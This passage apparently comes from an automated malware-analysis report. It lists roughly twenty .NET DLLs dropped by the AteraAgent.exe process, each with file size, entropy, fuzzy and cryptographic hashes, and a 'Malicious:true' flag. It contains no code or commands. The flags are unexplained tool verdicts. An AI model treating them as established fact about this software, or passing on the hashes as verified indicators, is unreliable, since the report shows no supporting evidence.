                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.860268507366871
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:K+SWikW0uNyb8E9VF6IYijSJIVxAd58Nd:K+eGWEpYi60CY
                                                                                                                                                                                                                                                                                                                                  MD5:54ECC777251536A3FD1C6E192210EDBF
                                                                                                                                                                                                                                                                                                                                  SHA1:DF1650BF5C3BA0633657AB7A8F1F29D62CF52852
                                                                                                                                                                                                                                                                                                                                  SHA-256:DFFDF486DB3E0C31D54DC41045D7760FC6DBA8775BDC3A167ACA7EE481D029C4
                                                                                                                                                                                                                                                                                                                                  SHA-512:323BF8BD3505FB09CCEA49BE3815B566ED652BEE568DB39CD4B56BDD3DE41303537BAB6EFA34AE9146C2AAD1996AC286DF91E1F883268BAF16E4E732A0193E47
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.907185587915265
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:0AWzgWSsNyb8E9VF6IYijSJIVxXUxwJUs:0tAsEpYi60jr
                                                                                                                                                                                                                                                                                                                                  MD5:FDE6AFE5B60A2796ED16C86A34D0BFB2
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAA2E66E7711159ED4E49FBAD637CF9D58128EF
                                                                                                                                                                                                                                                                                                                                  SHA-256:2965A988947A2A9D239C2415DB08A3AED4B2E88BE05520EE7865B0D6BAF5FF92
                                                                                                                                                                                                                                                                                                                                  SHA-512:E60F71C45661D73C49F0527466F9E88142A0D8B2BFE0DC3FD568C1FD3D8C49ED18AA9186E5C50D093E1EE46B19655EBC34E38938EF9115254B64661E7D02BE7A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.864664035747848
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aBLRWbYWziZNyb8E9VF6IYijSJIVx7cZXD:aB2xi9EpYi60YR
                                                                                                                                                                                                                                                                                                                                  MD5:5DA2F0E5E2EA11CD35F1B7DD5FED9027
                                                                                                                                                                                                                                                                                                                                  SHA1:8A3E5E5C91FDB2A7CAEF6A99FA9C563C1160635D
                                                                                                                                                                                                                                                                                                                                  SHA-256:72B62A9B0D816AAE2DB864D357E160E53108FE8AEC57E447E2F645958125F89E
                                                                                                                                                                                                                                                                                                                                  SHA-512:CAE8771A752794A28A16E8666AEAF4609B2204DF3F78E9E5D5FE1CFEEDEB82BBCF6AD08F7CA543708DFD88E5E5EA2CF3021690D18B55903887957A4D30A27204
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853684662190347
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:mZxcMRW4/W5TPPNyby2sE9jBF6IYiYF85S35IVnxGUHFyF5yLEaZP:mHW4/W1HNyb8E9VF6IYijSJIVx+wEQ
                                                                                                                                                                                                                                                                                                                                  MD5:B1CD6E53576B7CBFB0FD6AF7F7990AFC
                                                                                                                                                                                                                                                                                                                                  SHA1:A10AAF2819885F543DB3E364022C0EDAF8CCBEF0
                                                                                                                                                                                                                                                                                                                                  SHA-256:78C5460052BEA55F5388D5DC702923CC545834F67D556446A66548E1E12BF41D
                                                                                                                                                                                                                                                                                                                                  SHA-512:980C08FD2AA3B05D6A6C843898998D0CADB0164C4799D666ED788BD8A24E222DFABC3CFF683360B2E3B5E48202DE0099D81A10ED9420B07E222AEF3780AFE933
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9104870581606725
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:xvk7hWmCWKpNyb8E9VF6IYijSJIVxu2Si:xs7/GtEpYi606i
                                                                                                                                                                                                                                                                                                                                  MD5:EB957A4917DCADEC7BB7802748A352A4
                                                                                                                                                                                                                                                                                                                                  SHA1:DB19F6F1963A823CEC71AA8C60A2238431B7CC33
                                                                                                                                                                                                                                                                                                                                  SHA-256:15AB87C1CA71F431388811EDEF5608B8E815AA5B21320649DF4CEF1C8989EA13
                                                                                                                                                                                                                                                                                                                                  SHA-512:31188C40E68CF39145E99217FD779B961B3A8A0F9E0521D6F07ACF198DA67AC343AAF0559DC314A427FA985ACEBC937F36F37725F244897E1CF4A3AC0F4A5BBD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8756451362359
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:vGMWCUWiBNyb8E9VF6IYijSJIVxRohsUhGS:v38FEpYi60hUhr
                                                                                                                                                                                                                                                                                                                                  MD5:67133600C6AD317ED59A36BEA90D3B56
                                                                                                                                                                                                                                                                                                                                  SHA1:4125A69321DE7BF1DD32ABEC264DD5D4ABC81A34
                                                                                                                                                                                                                                                                                                                                  SHA-256:5686375D5B14B5D0344A76C0A31D1EBF3FE8BB698C5DFDCED51891A7917C6319
                                                                                                                                                                                                                                                                                                                                  SHA-512:AEB0E6D02F39E86D153003218205648C5C79E98A76E3991B07C622727491F228E2BC0C21CB0D847CE2F373278370B5086778096451B32C4DFD2759BDAD9161F8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853171439384106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KBhwI7WSQWEQNyb8E9VF6IYijSJIVxCtgHN:KDwIBSoEpYi60j
                                                                                                                                                                                                                                                                                                                                  MD5:AC6C7DED172F6CD19BFED88A099A067E
                                                                                                                                                                                                                                                                                                                                  SHA1:6D8BDCC64A288AD00CD7CCAFE40163BE37F0681E
                                                                                                                                                                                                                                                                                                                                  SHA-256:8A4A18372EEA55F5052FBED8C1E1DE567F0AEB6B9DB8AFC93FFB0BCB13C9BFC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:987E08DD6EAD5AD86EFE9401760C48D2E67F6CDCE51B9AF4620C037D8BE316FAFE37D5946860B4857D76B314485B6746515CCB86F28B29CFFD9F163DE31CD706
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.871202758504248
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kyvPRW4lWvKNyb8E9VF6IYijSJIVxnKJtImVm:l39oKEpYi60Q9Y
                                                                                                                                                                                                                                                                                                                                  MD5:B3C22FAC5F3D4802F24B6232AA7747AD
                                                                                                                                                                                                                                                                                                                                  SHA1:C106E0167117D69811C2648344F867FD68012A43
                                                                                                                                                                                                                                                                                                                                  SHA-256:724D73988F3AB54953D20211DA25C7DEF123D563C5F911CD8B0DCA5EF879B8C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:8356F9B44454218ED410A42064932FED750423289B0AF079B54F79DA6881D4A2C71B716F79D12A3B96F4BB03A054419260932466BF7D00081404F05D63A28FDC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.821922609942847
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3nhp+J2sx/5W6eW5lPENyby2sE9jBF6IYiYF85S35IVnxGUHF9IAcFnDp:X6RW6eWX8Nyb8E9VF6IYijSJIVxiA+nN
                                                                                                                                                                                                                                                                                                                                  MD5:9867AF19892EC63E2735D0586CB1BB32
                                                                                                                                                                                                                                                                                                                                  SHA1:1F06306C944A59C3CFFC02D98F23798887AB58F4
                                                                                                                                                                                                                                                                                                                                  SHA-256:99F43E4DE804DC60719CA95B2A8D8F72ACD9C373CA69FB9E373539DE004D59FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:63760414A51DC0CBDAEA59796315480244ACB29409A731310EDB4B0608BDD45179A6DB8072F73BC229EDE9C0471455F823BA6C3584FF5AD20D01DC77C63FD7A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853203582617837
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ZSUP9W70WxhNyb8E9VF6IYijSJIVxu11S/l:gUe/lEpYi6006l
                                                                                                                                                                                                                                                                                                                                  MD5:56FA4FE3BF2B273E00522905B3799A3C
                                                                                                                                                                                                                                                                                                                                  SHA1:A16628F9E9449B16E7D5FF5C87A065161EB51C7C
                                                                                                                                                                                                                                                                                                                                  SHA-256:986451206E760FC7F0EB5232A8F01529DA1C9F534922A0324BBB8B79CEAA3F1A
                                                                                                                                                                                                                                                                                                                                  SHA-512:A628B5F90E28D1A8FF15E9182E38EAB613889952EA431D02364D933C207660D14EDC6E765C03C4E0ECB2C782EDA22995B9B67CA76ECD7F2C0EBCC0669E79C758
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.851168312584129
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:e8yg07W0/WtTNyb8E9VF6IYijSJIVx/o3MW:eBHEPEpYi60AV
                                                                                                                                                                                                                                                                                                                                  MD5:293C6523C19B456CB6274E4D940A65FD
                                                                                                                                                                                                                                                                                                                                  SHA1:B4AD49F6ED659748CB62DB014E8042ECC0D5C3A3
                                                                                                                                                                                                                                                                                                                                  SHA-256:3D9A94CCFFA200B989CD1E73E48685D3C866C8A3872FFADFB61C0AB7F1D27E28
                                                                                                                                                                                                                                                                                                                                  SHA-512:F2270410224C729055006CDF703004F5685A1695EBB692D35D9822AE3DB4907295255828AD1EEB9C6ACCCB7400217849543736CFB5F876B9712028AF9E113484
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.816344691451213
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cueAxQJ4WmRW5WPtNyby2sE9jBF6IYiYF85S35IVnxGUHFONIgMk:Se1WmRWgFNyb8E9VF6IYijSJIVxaqgN
                                                                                                                                                                                                                                                                                                                                  MD5:AEF19D2432A273888E3FC230B1EEA4E5
                                                                                                                                                                                                                                                                                                                                  SHA1:E2343DFA8BFB6639E92909639C030CF2101F3959
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B20938ADBD20304728313BA716F840E7C0763BF177AF8BD0C8340E403494070
                                                                                                                                                                                                                                                                                                                                  SHA-512:B5E09F3AB7515C3BFB9256F7984AC2EA58FA48930327BE89869A4EB163AD44BBFC1F8E2425371EB198F4DD6CE6481D787B21EF43E14FEA5569A280F2E942FC1C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):142376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.16079949765909
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:qUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlqb:dBFd3/aFs22
                                                                                                                                                                                                                                                                                                                                  MD5:FBE66819EB3D9C2BF13220AED61ECA02
                                                                                                                                                                                                                                                                                                                                  SHA1:5D8B33F6102F7E4441CD53C7CB6FD69CA86E6F89
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B61FF3A55C9915891EDC5E54020C6007D3999E974D35FDA6C496FF801A52A3C
                                                                                                                                                                                                                                                                                                                                  SHA-512:C514043A08927CA8281C49D6C063106CDCFFC351B574A406245CBDDAD6E4BC5EF0B48CE6597E516106FB5C3EC0F1C235C00B5A3D3EEFBFA9136C661D508031BB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):192552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.114522555938557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:feruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgSb2:iW60VcTvakcXcApOm
                                                                                                                                                                                                                                                                                                                                  MD5:22936FF89D87A11BBCF81C37E12AFAC6
                                                                                                                                                                                                                                                                                                                                  SHA1:533A1C7603ACC27E2CF08F897586B9D657033062
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC7DE31CF9DEEF74361EC645CB3DA3DE0AB5FD53A25624BDCC0D84A2B80BCD96
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3AB024862C2246F6814EA3E0E0DBAC0100A3C1F4D3545D4D1AF62AE38D1CBB4EABFA55082CF2A5C35887B883FDEE50EE37BDC16725A2564B9D12D9DF41517FD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.83723175247609
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:V6ZWYLWBwNyb8E9VF6IYijSJIVxNNLxfR/:V6l4IEpYi60RR/
                                                                                                                                                                                                                                                                                                                                  MD5:C903E869B62A48267B98640224C9DB1F
                                                                                                                                                                                                                                                                                                                                  SHA1:EE05E7CB443DF6D566FA3373F810AD37BE31941D
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC81A082833E1004B2F659B925FAC0AC64905E8EE486BF817F300BA556F19030
                                                                                                                                                                                                                                                                                                                                  SHA-512:080C463748AB4048BF33DD384F8EF9F10BE1D528FB7E90345BA92344D60FC726FF1A9E68EA139B9988FE668D8BA979034D35E74C2039E9D7B0C821C18EA20E69
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.789481214761314
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:E1W1WMQWkMNyb8E9VF6IYijSJIVxuH1+nA:n1yMEpYi60uj
                                                                                                                                                                                                                                                                                                                                  MD5:9CCFB60C5D7183D474072815F3D91A7F
                                                                                                                                                                                                                                                                                                                                  SHA1:FB5F8CC8084826367D2F5D0FA76388EA46F76AA2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0B463BE26D6EC7DAFA25E94BD9F65ED99F79DA9EF564ED58E26E363E610F856
                                                                                                                                                                                                                                                                                                                                  SHA-512:8118EF2C7F3759F6E40950D50C453985A20A5A3E4D6685509D4B148FCAEC59E59D6357A032FB302B9928A334310BC9D8888C0B05BC86B07EE63091B338A41106
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.834301954407299
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:WQ/rx72WSKW5TPZNyby2sE9jBF6IYiYF85S35IVnxGUHFA/P6zt:1dSWSKW1BNyb8E9VF6IYijSJIVxs6zt
                                                                                                                                                                                                                                                                                                                                  MD5:3814B8116C13D30127539AF9E9DDF463
                                                                                                                                                                                                                                                                                                                                  SHA1:F883188A52D52C274ED9AE748EC27742D503B1AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:96C763C2C9DC57EE5ECAF08B65EED3E9529F5A4C156DCEBFD910B8424B269A0B
                                                                                                                                                                                                                                                                                                                                  SHA-512:48D94D40229A4A042EE4F3074F99D69EE11F7D2487A421FEAF6062EE7A420BD1D1BF784455573710CD74A883DB418E0AF2D01E8A4117B227D3AFC9A097B1E886
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.748356386203578
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:JJEYA2WkIWcqNyb8E9VF6IYijSJIVx1IZU284p:JyYA8CqEpYi60+ZPp
                                                                                                                                                                                                                                                                                                                                  MD5:D4307509DAC61017AC43A7FA55F88D8D
                                                                                                                                                                                                                                                                                                                                  SHA1:032E28F1B582F73A60FF42EB1502BA6E0BE7B452
                                                                                                                                                                                                                                                                                                                                  SHA-256:516B4D130BCF3B9C69B1FB5B1B5CA64D1EE88181718BC0C1DD7EB930BC8B43EC
                                                                                                                                                                                                                                                                                                                                  SHA-512:7D33ABB53DA47063CD4C0E5B51610E6ED53F8F8EC8E99C61C7F18A6C870F57706B7983880FB3E9D591EB2A094CF8C1B0EF1B34D4872DD2BC861FBE87216E251C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.87193293427259
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8vJGWe4WTYNyb8E9VF6IYijSJIVx5Owy6Ut:CmRQEpYi60it
                                                                                                                                                                                                                                                                                                                                  MD5:364F1FA27E43FE8A665AFC2DD282E6AB
                                                                                                                                                                                                                                                                                                                                  SHA1:734F004F4B4FA0B52EFFBA62B9D8FC96FD4BEA22
                                                                                                                                                                                                                                                                                                                                  SHA-256:8D577A3DC5876852D4C4E8152D45F3E6B00D857D49966D8B7A406BC63AA32BC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:5FD2D513A75149F1F38FF8CBB857467E293CB8D5A080AC7EF6BFF85C930FD7ADC094F61BDDD6236223947E5D8DD3C8A3EC33E603C16FA52E26B0F7EA0AD6F91C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.783027629507771
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RdW1w3WesWn3Nyb8E9VF6IYijSJIVxV4D1A:O1wxd7EpYi60+q
                                                                                                                                                                                                                                                                                                                                  MD5:6A02A10DE6FD82498C24B351B75E164F
                                                                                                                                                                                                                                                                                                                                  SHA1:8270AEF156D4D9F402E2BA2137FBB7A4503D9B5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:B4864C59EE501AF6041CCD66FB137057039D1F437B47364D050E516E0B5A7576
                                                                                                                                                                                                                                                                                                                                  SHA-512:933B56B82D0401CC0783E15DA2755EF2913670603D1BEE6CA235B556C370AA42F6AB57A34204A2E73FE00C31544013FC294BB98E708BFBD39AEDF813321F238D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5934938504209475
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:eylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsW1gNyb8E9VFk:eyp12Bhkg3qnV/srYEpYi60RWjb
                                                                                                                                                                                                                                                                                                                                  MD5:C801401B7DA2B8754A0567FFCCDCA3BD
                                                                                                                                                                                                                                                                                                                                  SHA1:24403837FF427FDCE38629D8820483F8CCBEC356
                                                                                                                                                                                                                                                                                                                                  SHA-256:7A0F72200B002F31B1C04C8CE7A94329A22364D367F6AA28EB9C53C246E72C33
                                                                                                                                                                                                                                                                                                                                  SHA-512:FE17EE8A1D1D087488F7EDC52DEB284841D54A708AC06552DA4243DF9DC5C37F20BF9936797F74C9B94ED678CB557A741BE7B87E8E543AC4949E0D762CB2313E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853706532249759
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZSHlx2PW1bW5kPWNyby2sE9jBF6IYiYF85S35IVnxGUHFl5tc1ZiB:MHPAW1bWieNyb8E9VF6IYijSJIVxJ5oU
                                                                                                                                                                                                                                                                                                                                  MD5:EA4183E768E0C6FACC8DBC4E0BE233A8
                                                                                                                                                                                                                                                                                                                                  SHA1:412B28A105435C2F7EEA846FFF28810FEE371727
                                                                                                                                                                                                                                                                                                                                  SHA-256:F45F7FCB2A8398B9D2817B808F2B6141DD1E7071F86466C34D5D07EE523088FE
                                                                                                                                                                                                                                                                                                                                  SHA-512:915875A7AD021A458489209D3687DBE2B13791833178F95DD0890B843FED574C2D749F8EAEACE6637E30BF782C868A5BFE74A3314D81C356F01F242D2D5F396B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
